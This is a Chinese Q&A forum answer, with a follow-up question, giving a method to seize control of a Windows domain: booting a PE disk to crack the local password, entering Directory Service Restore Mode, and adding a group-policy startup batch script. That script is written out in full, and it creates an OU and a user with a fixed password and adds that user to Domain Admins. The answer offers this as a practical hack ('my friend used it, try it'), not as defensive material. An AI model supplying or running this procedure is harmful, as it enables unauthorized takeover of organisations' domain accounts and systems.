先用pe破本地密码,按F8,然后选择Directory Service Restore Mode。进入入目录还原模式下,打开组策略添加dsadd的启动脚本;此启动脚本,作用是在域下添加一个具有域管理员权限的用户达到破解的目的。
重新启动电脑,用新添加的用户登录修改原管理员密码即可。
脚本样本(bat格式):
dsadd ou ou=test,dc=zf,dc=com
dsadd user "cn=aa,ou=test,dc=zf,dc=com" -pwd QQqq1111 -pwdneverexpires yes -mustchpwd no -acctexpires never
net group "domain admins" aa /add
说明:此脚本保存成bat格式,作用:在域下新建一个OU test,再在这个OU 下新建一个AA的帐号,密码为:QQqq1111,再将此用户添加至域管理员组,让其拥有域管理员权限。
我朋友用过据说可行你试试吧
追问在说详细点我在如果可以我在送你200分